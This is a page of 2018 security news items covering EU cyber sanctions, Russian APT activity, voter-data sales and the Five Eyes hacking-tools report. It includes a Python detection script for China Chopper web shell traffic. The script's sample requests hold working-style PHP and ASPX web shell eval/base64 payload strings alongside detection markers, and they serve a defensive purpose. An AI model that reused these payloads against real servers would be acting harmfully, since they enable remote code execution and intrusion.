- BigBrothers -

Last update 09.10.2017 13:51:26



EU Leaders Vow Tough Action on Cyber Attacks
21.10.2018 securityweek 

EU leaders on Thursday condemned the attempted hack on the global chemical weapons watchdog and vowed to step up the bloc's efforts to tackle cyber attacks.

With concerns growing about the malign cyber activities of several countries around the world, notably Russia, the bloc's leaders called for work to begin to set up sanctions to punish hackers.

The decision at an EU summit in Brussels comes after eight countries led by Britain pushed for urgent moves to hit hackers, warning that a lack of action was giving the impression that cyber attacks would go unpunished.

"Work on the capacity to respond to and deter cyber attacks through EU restrictive measures should be taken forward," the 28 leaders said in their summit communique.

The statement condemned the bid, revealed this month, by Russia's GRU military intelligence agency to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

"Such threats and attacks strengthen our common resolve to further enhance the EU's internal security and our ability and capabilities to detect, prevent, disrupt and respond to hostile activities of foreign intelligence networks," the summit statement said.

A proposal backed by Britain, Lithuania, Estonia, Latvia, Denmark, Finland, Romania and the Netherlands earlier this week called for a sanctions regime to be set up to punish cyber attackers.

If approved, the EU sanctions regime would freeze assets held in the bloc by targeted individuals and ban them from travelling to the 28 member states.

But efforts to crack down on cyber attackers may face resistance from some EU members who want to improve relations with Russia, such as the new Italian government.

Britain Leads Calls for EU Action Against Hackers
19.10.2018 securityweek

British Prime Minister Theresa May will call on fellow EU leaders Thursday to take united action to punish cyber attackers, warning hackers cause economic harm and undermine democracies.

Britain is among eight European Union countries pushing for the bloc to urgently agree a new sanctions regime to address malign cyber activities.

"We should accelerate work on EU restrictive measures to respond to and deter cyber attacks, including a robust sanctions regime," May will say, according to pre-released comments.

She will add: "Malign cyber activity causes harm to our economies, and undermines our democracies.

"As well as protecting ourselves against attack, we must impose proportionate consequences on those who would do us harm."

The move comes amid growing concern at Russia's activities, with Western powers blaming Moscow for numerous acts of hacking and electronic interference.

This month the Netherlands revealed dramatic details of a bid by Russia's GRU military intelligence agency to hack the Organisation for the Prohibition of Chemical Weapons (OPCW) in The Hague.

This was "a stark example of the very real threats that we face", May will say, but also "a clear example of where these attacks can be prevented".

A confidential EU proposal seen by AFP and backed by Britain, Lithuania, Estonia, Latvia, Denmark, Finland, Romania and the Netherlands warns that "the pace of events has accelerated considerably".

The paper says it is "only a matter of time before we are hit by a critical operation with severe consequences on the EU".

Lithuania and the other Baltic states, Latvia and Estonia, say they come under near-daily cyber attacks, most originating in Russia, targeting everything from banks and government institutions to transport infrastructure.

Britain's National Cyber Security Centre (NCSC) revealed this week that it has dealt with more than 1,100 cyber incidents in the two years since it was set up, the majority carried out from within "hostile nation states".

May has repeatedly stressed that despite Britain's scheduled departure from the EU in March 2019, London wants the fullest possible security relationship with the bloc post-Brexit.

If approved, the EU sanctions regime would freeze assets held in the bloc by targeted individuals and ban them from travelling to the 28 member states.

But the proposal may face resistance from some EU members who want to improve relations with Russia, such as the new Italian government.

Russia-Linked Hackers Target Diplomatic Entities in Central Asia
18.10.2018 securityweek

Cybersecurity companies have been monitoring the activities of a threat group that focuses on espionage campaigns aimed at diplomatic entities in Central Asia.

Earlier this month, ESET detailed the threat actor's operations, which it tracks as Nomadic Octopus, at the Virus Bulletin conference. On Monday, Kaspersky also published a blog post covering some of the group's attacks and tools.

According to Kaspersky, which tracks the group as DustSquad, the hackers appear to speak Russian.

Anton Cherepanov, the ESET senior malware researcher who detailed Nomadic Octopus at Virus Bulletin, confirmed for SecurityWeek that the hackers may speak Russian based on the spear-phishing emails they send out and the use of Russian malware filenames.

ESET, which says the threat actor is very persistent, has identified only one type of malware used by Nomadic Octopus and has found evidence that the group has been active since at least 2015.

Kaspersky, however, has discovered both Windows and Android malware, and identified a campaign that dates as far back as 2014. The cyberspies appear to be focusing on private individuals and diplomatic entities in Central Asia, mostly former Soviet Union countries and Afghanistan.

In April 2018, researchers at Kaspersky discovered a new sample of DustSquad's Windows malware, which they are tracking as Octopus. The malware had been disguised as the Telegram messaging application, specifically a Russian version that appeared to have been used by the Democratic Choice (DVK) opposition party in Kazakhstan. The fake app emerged just as Kazakhstan had threatened to block Telegram over its use by the DVK.

DustSquad develops its Octopus Trojan in Delphi, the language also used for Sofacy's Zebrocy malware. While both DustSquad and Sofacy have been linked to Russia, and malware from both groups has been found on the same compromised machines, Kaspersky believes the two threat actors are not related.

An analysis of the Octopus malware's components revealed some apparently unfinished functionality. Kaspersky believes the malware was built in a hurry and that its developers chose not to implement certain capabilities rather than leaving them half-finished.

Once it infects a system, the malware gives attackers remote access to the targeted machine, including the ability to execute commands, upload and download files, take screenshots, and search for RAR archives.

"Political entities in Central Asia have been targeted throughout 2018 by different actors, including IndigoZebra, Sofacy (with Zebrocy malware) and most recently by DustSquad (with Octopus malware)," Kaspersky researchers said. "Interestingly, we observed some victims who are ‘threat magnets’ targeted by all of them. From our experience we can say that the interest shown by threat actors in this region is now high, and the traditional ‘players’ have been joined by relative newcomers like DustSquad that have sprung up locally."

After 2016 Hack, Illinois Says Election System Secure
18.10.2018 securityweek BigBrothers Hacking

Illinois officials assured voters Tuesday that their Nov. 6 tallies "will be securely counted" following a data breach that's part of the Justice Department's investigation of Russian meddling in U.S. elections.

Board of Elections Chairman William Cadigan and a group of state and local officials — including Illinois National Guard leaders — said in Chicago that beefed-up measures to monitor and spot cybersecurity risks will ensure a fair and free election.

"We're as prepared as we ought to be right now, given the information we have," Cadigan said. "People should get out and vote because your vote is going to count and at the end of the day, we believe it's going to be securely counted."

The board hired three cybersecurity experts to watch elections and voter-data systems for irregularities, Cadigan said, including one housed at the Illinois State Police Statewide Terrorism and Intelligence Center. Local elections administrators have undergone rigorous training and the National Guard is on call for emergencies.

Officials discovered in summer 2016 that a hacker had downloaded information on up to 76,000 Illinois voters in what federal authorities allege was a concentrated attack by Russian intelligence agents; whether the attackers penetrated states other than Illinois has never been determined.

State officials notified those affected, and there is no indication that voting that fall was affected. But the Illinois breach and its potential damage were evident when it formed part of Justice Department special counsel Robert Mueller's indictment last July of a dozen Russian intelligence agents for hacking. The indictment alleged that the perpetrators stole information from as many as 500,000 voters.

Illinois authorities believe Mueller's investigators are counting even fragments of personal data that were not complete enough to require them to alert a voter.

Officials also noted that despite electronic voting in Illinois, state law requires that each vote leave behind a paper receipt, so any vote that is disrupted electronically can still be audited.

Logan County Clerk and Recorder Sally Turner said county and municipal elections administrators have met several times in the past year for extensive training on spotting and interpreting cyber threats.

"We want our communities and our voters to know that we as election officials in Illinois are focused on protecting our systems with rigorous attention to cybersecurity," Turner said.

Maj. Gen. Richard Hayes, Illinois' adjutant general, said Defense Department-trained analysts with the National Guard are on call. In case of catastrophe, they can be mobilized quickly.

"If someone tries to disrupt the election on Election Day, we can have a guardsman dispatched within an hour anywhere in Illinois," elections board member Chuck Scholl said. "We'll have boots on the ground in whatever county, whatever election authority that's affected, within an hour."

Russia-linked BlackEnergy backed new cyber attacks on Ukraine’s state bodies

17.10.2018 securityaffairs APT  BigBrothers

The Security Service of Ukraine (SBU) has uncovered a new targeted attack on the information and telecommunication systems of Ukrainian government entities, which it attributes to the Russia-linked BlackEnergy APT group.
“The Security Service of Ukraine has received more evidence of the aggressive actions of Russian intelligence services against Ukraine in cyberspace using a controlled hacker group responsible for carrying out cyberattacks on Ukraine’s critical infrastructure facilities during 2015-2017, known as BlackEnergy and NotPetya,” reads the SBU’s press release.

BlackEnergy made the headlines as the responsible for the massive power outage that occurred in Ukraine in December 2015.

The BlackEnergy malware has been developed into a threat aimed at SCADA systems; some variants include the KillDisk component, built to wipe disks and render systems inoperable.

According to the SBU, the BlackEnergy operators used new malware samples in the recent series of attacks. The new code functions as surveillance software, combining monitoring capabilities with remote administration features.

Working with experts from a well-known antivirus company, the SBU determined that the malware involved in the attack is an updated version of the Industroyer backdoor.

The specialists involved in the investigation helped the Ukraine SBU to attribute the attack and implement mitigations to protect the IT infrastructure of government agencies.

As reported by the ukrinform.net website, the malware used in the recent attacks borrows code from Industroyer.

“They have a number of similar characteristics, in particular using similar code snippets, computing capabilities of infected systems, etc.,” ukrinform.net states.

Experts from the SBU also observed attackers using hacking tools that were used by the BlackEnergy hackers in previous attacks.

35 million US voter records available for sale in a hacking forum
17.10.2018 securityaffairs 

Millions of voter records are available for sale on the Dark Web: experts from Anomali and Intel 471 discovered over 35 million US voter records for sale in a hacking forum.

Researchers have analyzed a sample of voter records and determined the data to be valid with a high degree of confidence.

Records in the voter registration database include personal and voting history information of US residents.

The seller gave record counts only for three states, with asking prices between $1,300 and $12,500:

Louisiana (3 million);
Wisconsin (6 million);
Texas (14 million).

The seller also claims to hold voter lists for other states, including Montana, Iowa, Utah, Oregon, South Carolina, Kansas, Georgia, New Mexico, Minnesota, Wyoming, Kentucky, Idaho, Tennessee, South Dakota, Mississippi, and West Virginia.

According to the seller, the voter lists are updated weekly with the help of people inside the state governments.

“Certain states require the seller to personally travel to locations in-state to receive the updated voter information,” reads a report published by Anomali Labs.

“This suggests the information disclosure is not necessarily a technical compromise but rather a likely targeted campaign by a threat actor redistributing possibly legitimately obtained voter data for malicious purposes on a cybercrime forum.”

This kind of information is a valuable commodity for threat actors, and forum members have already expressed interest in the trove.

“With the November 2018 midterm elections only four weeks away, the availability and currency of the voter records, if combined with other breached data, could be used by malicious actors to disrupt the electoral process or pursue large scale identity theft,” explained Hugh Njemanze, chief executive officer of Anomali.

The persistent access to voter records claimed by the seller represents a serious threat to US voters and to US politics.

“Given the illicit vendor claims of weekly updates of voter records and their high reputation on the hacker forum, we assess with moderate confidence that he or she may have persistent database access and/or contact with government officials from each state,” the report concludes.

“These types of unauthorized information disclosures increase the threat of possible disruptive attacks against the U.S. electoral process such as voter identity fraud and voter suppression.”

Pentagon Reveals Cyber Breach of Travel Records
14.10.2018 securityweek BigBrothers Incident

The Pentagon on Friday said there has been a cyber breach of Defense Department travel records that compromised the personal information and credit card data of U.S. military and civilian personnel.

According to a U.S. official familiar with the matter, the breach could have affected as many as 30,000 workers, but that number may grow as the investigation continues. The breach could have happened some months ago but was only recently discovered.

The official, who spoke on condition of anonymity because the breach is under investigation, said that no classified information was compromised.

According to a Pentagon statement, a department cyber team informed leaders about the breach on Oct. 4.

Lt. Col. Joseph Buccino, a Pentagon spokesman, said the department is still gathering information on the size and scope of the hack and who did it.

"It's important to understand that this was a breach of a single commercial vendor that provided service to a very small percentage of the total population" of Defense Department personnel, said Buccino.

The vendor was not identified and additional details about the breach were not available.

"The department is continuing to assess the risk of harm and will ensure notifications are made to affected personnel," said the statement, adding that affected individuals will be informed in the coming days and fraud protection services will be provided to them.

Buccino said that due to security reasons, the department is not identifying the vendor. He said the vendor is still under contract, but the department "has taken steps to have the vendor cease performance under its contracts."

Disclosure of the breach comes on the heels of a federal report released Tuesday that concluded that military weapons programs are vulnerable to cyberattacks and the Pentagon has been slow to protect the systems. And it mirrors a number of other breaches that have hit federal government agencies in recent years, exposing health data, personal information, and social security numbers.

The U.S. Government Accountability Office in its Tuesday report said the Pentagon has worked to ensure its networks are secure, but only recently began to focus more on its weapons systems security. The audit, conducted between September 2017 and October 2018, found that there are "mounting challenges in protecting its weapons systems from increasingly sophisticated cyber threats."

In 2015, a massive hack of the federal Office of Personnel Management, widely blamed on China's government, compromised personal information of more than 21 million current, former and prospective federal employees, including those in the Pentagon. It also likely occurred months before it was discovered and made public, and it eventually led to the resignation of the OPM director.

Also that year, hackers breached the email system used by the Joint Chiefs of Staff, affecting several thousand military and civilian workers.

The Defense Department has consistently said that its networks and systems are probed and attacked thousands of times a day.

U.S. Senators Demand Internal Memo Related to Google+ Incident
14.10.2018 securityweek

A group of United States senators on Thursday sent a letter to Google, urging it to provide an internal memo that supposedly explains why the company did not disclose the Google+ data exposure that was discovered in March.

The vulnerability, in a Google+ API, gave third-party applications access to profile data they were not authorized to read, and up to 500,000 user accounts may have been affected. The API had apparently been exposing the data since 2015.

Google claims it has no evidence of developers being aware of the bug or of account data being misused. However, the Internet giant decided to shut down the Google+ platform, citing low user interest and difficulties in making it successful.

Coming amid the privacy concerns raised by the Facebook-Cambridge Analytica scandal that erupted in March, the search company’s decision to keep the flaw’s discovery quiet does not sit well with privacy-conscious users. The disclosure also cast a shadow over the launch of Google’s new phone, the Pixel 3.

Privacy is the concern three U.S. senators underline in a letter sent to Google chief executive officer Sundar Pichai.

They also question the Internet giant’s decision against a timely disclosure of the data exposure, as well as its willingness to inform the public when it becomes aware of any misuse of the impacted data.

The letter also cites a Wall Street Journal article describing an internal Google memo that lays out the factors behind the company’s decision not to disclose the issue, among them fear that disclosure would draw the attention of regulators and invite comparisons to the Facebook privacy scandal.

“Data privacy is an issue of great concern for many Americans who use online services. Particularly in the wake of Cambridge Analytica controversy, customers’ trust in the companies that operate those services to keep their data secure has been shaken,” the letter reads.

“It is for this reason that the reported contents of Google’s internal memo are so troubling. At the same time that Facebook was learning the important lesson that tech firms must be forthright with the public about privacy issues, Google apparently elected to withhold information about a relevant vulnerability for fear of public scrutiny,” the letter continues.

What’s more, the senators mention the fact that, although Pichai testified in front of the Senate Commerce Committee on the issue of privacy only a couple of weeks ago, he did not mention the Google+ issue at the time.

“Google must be more forthcoming with the public and lawmakers if the company is to maintain or regain the trust of the users of its services,” the letter continues.

The senators ask Pichai to provide written responses to questions on when and how Google discovered the Google+ issue, why it chose not to disclose it, whether it informed federal agencies of the discovery, and whether there are other incidents it has chosen not to disclose, among others.

On top of that, the senators, who urge Google to provide a copy of the internal memo cited in the Wall Street Journal, ask the search company whether users of free Google services “should be afforded the same level of notification and mitigation efforts as paid G Suite subscribers” (Google is apparently committed to inform G Suite users immediately of any incidents involving their data).

Five Eyes Intelligence agencies warn of popular hacking tools
13.10.2018 securityaffairs

Cybersecurity agencies of the Five Eyes intelligence alliance (United States, United Kingdom, Canada, Australia and New Zealand) have released a joint report detailing five of the most widely used publicly available hacking tools, how to detect them, and how to limit their effectiveness.

The report was produced with contributions from researchers at the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC), and the US National Cybersecurity and Communications Integration Center (NCCIC).

“This report is a collaborative research effort by the cyber security authorities of five nations: Australia, Canada, New Zealand, the United Kingdom, and the United States,” reads the report published by the experts.

“In it we highlight the use of five publicly available tools, which have been used for malicious purposes in recent cyber incidents around the world. The five tools are:

Remote Access Trojan: JBiFrost
Webshell: China Chopper
Credential Stealer: Mimikatz
Lateral Movement Framework: PowerShell Empire
C2 Obfuscation and Exfiltration: HUC Packet Transmitter
To aid the work of network defenders and systems administrators, we also provide advice on limiting the effectiveness of these tools and detecting their use on a network.”

The report provides technical details on remote access trojans (RATs), web shells, credential stealers, lateral movement frameworks, and command and control (C&C) obfuscators.

The first tool analyzed is the JBiFrost RAT, a variant of the Adwind backdoor, which has been used by almost every class of attacker, from nation-state groups to low-skilled crooks.

“JBiFrost RAT is typically employed by cyber criminals and low-skilled threat actors, but its capabilities could easily be adapted for use by state-sponsored threat actors.

Other RATs are widely used by Advanced Persistent Threat (APT) actor groups, such as Adwind RAT, against the aerospace and defense sector; or Quasar RAT, by APT10, against a broad range of sectors.” states the report.

“JBiFrost RAT is Java-based, cross-platform, and multifunctional. It poses a threat to several different operating systems, including Windows, Linux, MAC OS X, and Android.”

The report also covers Mimikatz, a popular post-exploitation credential-theft tool used by many threat actors, and the lateral movement framework PowerShell Empire, which attackers use to elevate privileges, harvest credentials, find nearby hosts, and move laterally across the target network.

The experts at Five Eyes agencies also detailed the China Chopper web shell, a code injection web shell that executes Microsoft .NET code within HTTP POST commands.

China Chopper is a tiny (4 KB) shell widely used in attacks in the wild since 2012; earlier this year the China-linked APT group Leviathan, aka TEMP.Periscope, used it in attacks on engineering and maritime entities.

The last tool described in the report is HUC Packet Transmitter (HTran), which attackers use to obfuscate communications in order to bypass security controls and evade detection.

“The individual tools we cover in this report are limited examples of the types of tools used by threat actors. You should not consider this an exhaustive list when planning your network defense.” states the report.

“Tools and techniques for exploiting networks and the data they hold are by no means the preserve of nation states or criminals on the dark web. Today, malicious tools with a variety of functions are widely and freely available for use by everyone from skilled penetration testers, hostile state actors and organized criminals, to amateur cyber criminals.

The tools in this Activity Alert have been used to compromise information across a wide range of critical sectors, including health, finance, government, and defense. Their widespread availability presents a challenge for network defense and threat-actor attribution.”

'Five Eyes' Agencies Release Joint Report on Hacking Tools

12.10.2018 securityweek BigBrothers

Cybersecurity agencies in the United States, United Kingdom, Canada, Australia and New Zealand have released a joint report describing five of the most commonly used hacking tools.

The report was written by experts at the Australian Cyber Security Centre (ACSC), the Canadian Centre for Cyber Security (CCCS), the New Zealand National Cyber Security Centre (NZ NCSC), CERT New Zealand, the UK National Cyber Security Centre (UK NCSC), and the US National Cybersecurity and Communications Integration Center (NCCIC).

The goal of the report, its authors said, is to provide network defenders and system administrators advice on how to detect the tools and limit their effectiveness.

Five types of tools are described, including remote access trojans (RATs), web shells, lateral movement frameworks, command and control (C&C) obfuscators, and credential stealers – all of which can be used after the targeted system has been compromised.

The RAT included in the report is JBiFrost, a variant of Adwind. The Five Eyes agencies have warned that while JBiFrost has been mostly used by low-skilled threat actors and cybercriminals, it can also be useful to state-sponsored groups.

JBiFrost works on Windows, Linux, macOS and Android, and its capabilities include lateral movement, installing additional malware, launching distributed denial-of-service (DDoS) attacks, and stealing information.

Agencies warned that JBiFrost has been increasingly used in targeted attacks aimed at critical infrastructure operators and their supply chain.

The web shell mentioned in the report is called China Chopper and it allows hackers to remotely access compromised servers. Widely used since 2012, the shell is only 4 KB in size and its payload is easy to modify, which makes it harder to detect.

China Chopper was used in the summer of 2018 in an attack that exploited an Adobe ColdFusion vulnerability tracked as CVE-2017-3066.

Another tool described in the report is Mimikatz, a popular open source application that has been around for more than a decade. Mimikatz has been used by many threat groups to steal passwords, including in the recent NotPetya and Bad Rabbit attacks.

Cybersecurity agencies have also warned of PowerShell Empire, a lateral movement framework released in 2015 as a legitimate penetration testing tool. PowerShell Empire allows attackers to elevate privileges, harvest credentials, log keystrokes, find nearby hosts, and move laterally across the network.

The tool was used in recent years in attacks aimed at the UK energy sector, South Korean organizations as part of a Winter Olympics-themed campaign, a multinational law firm, and academia.

The last hacking tool described in the report is HUC Packet Transmitter (HTran), which allows malicious actors to obfuscate communications. Hackers have been using it to evade detection, bypass security controls, obfuscate C&C traffic, and improve their C&C infrastructure.

"These tools have been used to compromise information across a wide range of critical sectors, including health, finance, government and defence. Their widespread availability presents a challenge for network defence and actor attribution," the report reads. "Experience from all our countries makes it clear that, while cyber actors continue to develop their capabilities, they still make use of established tools and techniques. Even the most sophisticated groups use common, publicly-available tools to achieve their objectives."
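The detection advice both articles summarize is easiest to see in code. The following Python is an added example for this page, not code from the Five Eyes report or from either article: it runs a China Chopper-oriented check over a handful of constructed HTTP request records. The Request and Finding types, the analyse/scan functions and the SAMPLE_REQUESTS data are all invented here for illustration. The indicators it looks for (an eval(, base64_decode(, FromBase64String( or Response.Write( call inside a POST parameter sent to a server-side script, z0-style helper parameters, and ->| / <-| framing in the response) are drawn from public write-ups of the tool's client traffic and are an assumption to tune for your environment, since operators modify the payload, which is exactly why the report calls the shell hard to detect.

```python
import base64
import re
from dataclasses import dataclass, field
from typing import List, Optional
from urllib.parse import parse_qs, urlencode

# Indicators taken from public analyses of China Chopper client traffic.
# Assumption: operators modify the one-liner, so these are leads to tune, not proof.
CLIENT_MARKERS = (
    "eval(",               # PHP / JScript server side evaluates the posted code
    "base64_decode(",      # PHP variant: the real payload rides in a base64 parameter
    "FromBase64String(",   # ASPX / .NET variant does the same
    "Response.Write(",     # ASPX variant frames its output for the client
)
RESPONSE_DELIMS = ("->|", "<-|")   # framing the client strips from replies
HELPER_PARAM = re.compile(r"z\d")  # z0, z1, ... carry arguments for the posted code
SCRIPT_EXT = re.compile(r"\.(php|aspx?|jsp|cfm)$", re.IGNORECASE)
B64_RUN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


@dataclass
class Request:              # one access-log / proxy record (constructed format)
    src_ip: str
    method: str
    path: str
    body: str               # raw application/x-www-form-urlencoded body
    response_body: str = ""


@dataclass
class Finding:
    src_ip: str
    path: str
    reasons: List[str] = field(default_factory=list)
    decoded: str = ""       # plaintext of the largest base64 blob, for the analyst


def decode_largest_base64(values: List[str]) -> str:
    """Return the decoded text of the longest base64-looking run, or '' if none decodes."""
    runs = [r for v in values for r in B64_RUN.findall(v)]
    for cand in sorted(runs, key=len, reverse=True):
        try:
            text = base64.b64decode(cand, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):   # binascii.Error is a ValueError
            continue
        if all(ch.isprintable() or ch in "\r\n\t" for ch in text):
            return text
    return ""


def analyse(req: Request) -> Optional[Finding]:
    """Flag a request only if code-evaluation markers reach a server-side script."""
    if req.method.upper() != "POST" or not SCRIPT_EXT.search(req.path):
        return None
    params = parse_qs(req.body, keep_blank_values=True)
    finding = Finding(req.src_ip, req.path)
    for name, values in params.items():
        hits = sorted({m for v in values for m in CLIENT_MARKERS if m in v})
        if hits:
            finding.reasons.append(f"param {name!r} carries {', '.join(hits)}")
        if HELPER_PARAM.fullmatch(name):
            finding.reasons.append(f"China Chopper-style helper param {name!r}")
    if any(d in req.response_body for d in RESPONSE_DELIMS):
        finding.reasons.append("response framed with ->| / <-| delimiters")
    if not finding.reasons:
        return None
    finding.decoded = decode_largest_base64([v for vs in params.values() for v in vs])
    return finding


def scan(requests: List[Request]) -> List[Finding]:
    return [f for f in map(analyse, requests) if f is not None]


def _b64(s: str) -> str:
    return base64.b64encode(s.encode()).decode()


# Constructed sample traffic (not captured data): two benign POSTs, then a PHP-style
# and an ASPX-style China Chopper exchange. urlencode() builds the form bodies.
PHP_CODE = '@ini_set("display_errors","0");@set_time_limit(0);echo "OK";'
ASPX_CODE = 'Response.Write("whoami")'
SAMPLE_REQUESTS = [
    Request("10.0.0.5", "POST", "/login.php",
            urlencode({"user": "alice", "password": "hunter2"})),
    Request("10.0.0.9", "POST", "/upload.aspx",
            urlencode({"avatar": base64.b64encode(b"\x89PNG\r\n\x1a\n" * 8).decode()})),
    Request("203.0.113.7", "POST", "/images/logo.php",
            urlencode({"pass": "@eval(base64_decode($_POST[z0]));", "z0": _b64(PHP_CODE)})),
    Request("203.0.113.7", "POST", "/img/help.aspx",
            urlencode({"password": 'Response.Write("->|");eval(System.Text.Encoding'
                       '.GetEncoding(65001).GetString(System.Convert.FromBase64String("'
                       + _b64(ASPX_CODE) + '")),"unsafe");Response.Write("<-|");'}),
            response_body="->|OK<-|"),
]

if __name__ == "__main__":
    for f in scan(SAMPLE_REQUESTS):
        print(f"{f.src_ip} -> {f.path}: {'; '.join(f.reasons)}")
        print(f"  recovered payload: {f.decoded!r}")
```

Run stand-alone, the script reports only the two requests to the .php and .aspx files under image directories and prints the code the attacker asked the server to evaluate. The base64 avatar upload is deliberately not flagged: base64 on its own is not an indicator, a script file receiving code to evaluate is, and decoding the blob for the analyst turns a signature hit into something a responder can act on.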

New Pentagon Weapons Systems Easily Hacked: Report
10.10.2018 securityweek

New US weapons systems being developed by the US Department of Defense can easily be hacked by adversaries, a new government report said on Tuesday.

The Government Accountability Office said the Pentagon was unaware of how easy it could be for an adversary to gain access to the computer brains and software of the weapons systems and operate inside them undetected.

The weak points began with poor password management and unencrypted communications, it said.

But it said access points for the systems continued to grow in number and are not always well-understood by the operators themselves, leaving even non-networked systems deeply vulnerable.

More critically, the report faulted the US military for not incorporating cybersecurity into the design and acquisition process for the computer-dependent weapons, and said weapons developers often did not themselves adequately understand cybersecurity issues.

"Due to this lack of focus on weapon systems cybersecurity, DOD likely has an entire generation of systems that were designed and built without adequately considering cybersecurity," the GAO said.

"In one case, it took a two-person test team just one hour to gain initial access to a weapon system and one day to gain full control of the system they were testing," it said.

In another case, it said, the test team gained control of the terminals of the system's operators.

"They could see, in real-time, what the operators were seeing on their screens and could manipulate the system."

The public, unclassified version of the report did not identify which arms systems it had tested and found faults with, citing the need for secrecy.

But it said that between 2012 and 2017, the Defense Department's own testers "routinely" found dangerous cyber vulnerabilities in "nearly all" weapons systems under development.

"Using relatively simple tools and techniques, testers were able to take control of these systems and largely operate undetected. In some cases, system operators were unable to effectively respond to the hacks," it said.

The risk rises as Pentagon weapons and other systems are increasingly interconnected and their dependence on software and networking continues to rise.

The report came as the US government wrestles with what it sees as concerted efforts by government-backed hackers in Russia and China to permeate government and private sector computer networks to steal data or simply wreak havoc.

Man Pleads Guilty to Hacking Websites of New York City Comptroller and West Point
8.10.2018 securityweek

The United States Department of Justice (DoJ) this week announced that a California man has pleaded guilty to hacking the websites for the Combating Terrorism Center at the United States Military Academy in West Point, New York, and the Office of the New York City Comptroller.

The man, Billy Ribeiro Anderson, 41, of Torrance, California, also known as “Anderson Albuquerque” and “AlfabetoVirtual,” admitted to obtaining unauthorized access to the two websites and to defacing them by replacing publicly available contents of the website with hacker-generated content.

According to court documents, from 2015 through at least March 13, 2018, Anderson took responsibility for accessing various U.S. military, government, and business websites around the world, all without authorization.

Using the online handle of AlfabetoVirtual, he also committed more than 11,000 defacements of said websites, including websites for the Combating Terrorism Center at West Point and the NYC Comptroller.

The NYC Comptroller’s website was defaced on July 10, 2015. Anderson, who took responsibility for the incident, replaced the contents of the website to display the text “Hacked by AlfabetoVirtual,” “#FREEPALESTINE” and “#FREEGAZA.”

The hacker gained access to the website and was able to deface it by exploiting security vulnerabilities associated with the version of a plugin being used on the website.

Anderson defaced a website for the Combating Terrorism Center at West Point on October 4, 2016 and modified the site’s content to display the text “Hacked by AlfabetoVirtual.” He gained access to the site via an unauthorized administrative account, exploiting a known cross-site scripting vulnerability that allowed him to bypass access controls.

Anderson also committed unauthorized intrusions of thousands of web servers worldwide through malicious code installed on the victim web servers. The code provided the hacker with administrative rights to the servers, which then enabled him to commit defacements and maintain a foothold on the compromised servers.

“The defendant pled guilty to two counts of computer fraud for causing damage to a protected computer, each of which carries a maximum sentence of 10 years in prison,” the DoJ announced. Anderson is scheduled for sentencing on February 13, 2019.

Russia's Hackers Long Tied to Military, Secret Services
8.10.2018 securityweek

During the Soviet era, the country's top computer scientists and programmers largely worked for the secret services.

That practice appears to have resumed under President Vladimir Putin, as Russia faces accusations of waging a global campaign of cyber attacks.

Dutch officials on Thursday accused four Russians from the GRU military intelligence agency of attempting to hack into the global chemical weapons watchdog in The Hague.

The watchdog has investigated both the fatal poisoning of Russian former double-agent Sergei Skripal and an alleged chemical attack by Moscow-allied Syrian President Bashar al-Assad.

The Baltic states were the first to accuse Moscow of mounting attacks to knock out their sites back in 2007.

Estonia said one such attack had put the country's main emergency service phone number out of action for over an hour.

Since then, accusations of cyber attacks have continued against Moscow.

The Russian hacker group variously known as Fancy Bear, APT 28 and Sofacy has been linked to GRU and accused of attacks on the US Democrats' 2016 presidential campaign, together with Russia's FSB security service, the successor to the KGB.

The skills of Russian hackers today developed from a tradition of excellent computing and programming skills dating back to the Soviet era.

"The whole structure of the economy was skewed towards the military sector," said Oleg Demidov, a consultant at the Moscow-based independent think-tank PIR Center.

"All the achievements of Soviet science including the first computers went to serve the military sector."

The most brilliant students were pushed to work in the military and space sector, he added.

- Banking crime -

After the Soviet Union fell apart in 1991, its armed forces were broken up and most of the top specialists turned to the nascent banking sector in Russia, either to work there or to attack it.

This era saw the first cyber attacks on banking operations and the first mentions of Russian hackers.

"Now Russian hackers are excellently trained and equipped and they still occupy one of the top positions in banking crime," said Demidov -- even if the Russian justice system has begun to crack down on them.

In 2016, Russian cybersecurity giant Kaspersky estimated that between 2012 and 2015, Russian hackers had stolen at least $790 million worldwide.

Russian computer scientists study at "very strong universities in Saint Petersburg, Moscow, Novosibirsk, Kazan or Krasnoyarsk", said Denis Kuskov of TelecomDaily specialised research agency.

They "can work anywhere in the world, in any international company," he added.

In recent years, however, more have opted to stay in Russia, he said. "The secret services have grown more interested in good programmers and it's easier for them to find work in Russia now."

In 2012, the Russian defence ministry announced it was creating its own "cyber troops". It launched a wide recruitment drive that included promotional videos on social media.

For Demidov, the growing wave of attacks attributed to Russian hackers has come about as Russia becomes better able to defend its own cyber security, the military sphere included.

"These efforts... have begun to bring results," he said.

Today however, even the most established players in Russian IT are in the sights of the West.

The US in 2017 imposed a ban on the use of Kaspersky's anti-virus software by federal agencies amid concerns about the company's links to the Russian intelligence services.

While many young Russians may choose to work for the military and secret services for reasons of patriotism, some may still be more interested by the money.

This week a military tribunal in Moscow held a closed-doors trial for the head of operational control at the FSB's centre for information security, Colonel Sergei Mikhalkov and three alleged accomplices.

Kommersant daily reported that they were accused of passing secrets on the Russian secret services' cyber technology to the FBI in return for $10 million.

UK, US Security Agencies Deny Investigating Chinese Spy Chips
8.10.2018 securityweek

The U.S. Department of Homeland Security (DHS) and the U.K. National Cyber Security Centre (NCSC) have denied investigating the presence of Chinese spy chips in Supermicro servers, as claimed by a bombshell report published last week by Bloomberg.

According to Bloomberg, the Chinese government planted tiny chips in Supermicro motherboards in an effort to spy on more than 30 organizations in the United States, including government agencies and tech giants such as Apple and Amazon.

The report, on which Bloomberg reporters have been working for the past year using information from 17 sources, claims that Chinese agents masquerading as government or Super Micro employees pressured or bribed managers at the Chinese factories where the motherboards are built. Once the chips were planted, they would allow attackers to remotely access the compromised devices.

Apple and Amazon allegedly discovered the malicious hardware implants and contacted the FBI.

While many experts agree that it is technically possible to create and plant spy chips such as the one described, Apple, Amazon and Super Micro have strongly denied the reports, and their statements have now been backed by the DHS and the NCSC.

“We are aware of the media reports but at this stage have no reason to doubt the detailed assessments made by AWS and Apple,” stated the NCSC. “The NCSC engages confidentially with security researchers and urges anybody with credible intelligence about these reports to contact us.”

The DHS also published a statement on Saturday saying it's aware of the media reports.

